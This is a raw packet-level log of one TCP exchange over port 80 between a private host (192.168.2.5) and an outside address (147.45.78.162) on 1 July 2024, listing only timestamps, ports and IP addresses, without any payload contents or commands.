Jul 1, 2024 13:02:13.565999031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566049099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566169024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566201925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566209078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566241026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566462040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566494942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566503048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566529036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566539049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566561937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.566565037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.566600084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567019939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567059994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567092896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567127943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567205906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567205906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567323923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567368031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567374945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567409039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567415953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567442894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567450047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567507982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.567790031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.567831993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589123964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589174032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589191914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589222908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589230061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589262009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589392900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589426041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589435101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589466095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589629889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589670897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589721918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589755058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.589764118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.589796066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596091032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596147060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596168041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596199036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596204996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596237898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596421003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596453905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596488953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596504927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596507072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596530914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596539021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.596539974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.596580029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923248053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923316002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923353910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923386097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923397064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923424959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923439980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923474073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923484087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923521042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923710108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923742056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923751116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923777103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.923784971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.923835039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924093962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924141884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924143076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924176931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924195051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924210072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924226046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924243927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924256086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924278021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.924283028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.924315929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925115108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925148964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925168037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925182104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925188065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925214052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925220013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925247908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925251961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925280094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925286055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925312996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925318003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925350904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.925964117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.925997019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926013947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926029921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926037073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926073074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926078081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926110029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926115036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926141977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926147938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926175117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926183939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926214933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926867008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926901102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.926917076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926938057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.926975965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927009106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927022934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927042961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927047014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927074909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927082062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927109957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927114964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927143097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927144051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927181959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927733898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927768946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927777052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927798033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927807093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927831888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927836895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927865028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927871943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927897930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927905083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927931070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.927936077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.927969933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928668022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928702116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928720951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928735971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928749084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928770065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928778887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928803921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928817987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928838015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928848028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928870916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.928880930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.928915024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929562092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929596901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929610014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929630041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929635048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929662943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929672003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929696083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929708004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929729939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929743052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929763079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.929769993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.929804087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930517912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930551052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930569887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930583954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930596113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930615902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930619955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930649042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930660963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930681944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930694103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930715084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.930730104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.930753946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931292057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931340933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931341887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931374073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931375980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931406021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931407928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931435108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931442976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931468010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931472063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931499958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931503057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931531906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931538105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931566000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931571007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931596994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931603909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931629896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.931637049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.931667089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932257891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932291031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932305098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932324886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932332993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932358027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932365894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932390928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932396889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932424068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932425022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932455063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932457924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932493925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.932503939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.932538033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933150053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933183908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933201075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933216095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933228016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933248043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933263063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933281898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933285952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933314085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933326960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933342934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933355093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933376074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933382034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933413982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933437109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933470964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.933476925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.933505058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934107065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934140921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934153080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934174061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934180975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934206009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934210062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934238911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934248924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934272051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934281111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934304953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934310913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934338093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934344053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934370995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934376001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934403896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.934406042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.934442997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935127974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935162067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935178995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935194969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935200930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935226917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935234070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935259104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935265064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935292006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935297012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935326099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935337067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935359001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935364008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935385942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935395002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935419083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.935424089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.935458899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936094999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936129093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936140060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936161995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936167955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936196089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936201096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936227083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936234951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936259031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936264038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936290979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936291933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936322927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936330080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936355114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936356068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936388969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.936393976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.936427116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937052965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937087059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937096119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937119007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937127113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937151909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937156916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937185049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937189102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937218904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937252045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937262058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937284946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937295914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937318087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937325001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937355995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.937361002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.937402964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938101053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938148975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.938591003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938606977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938621044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938636065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.938643932 CEST	80	49705	147.45.78.162	192.168.2.5
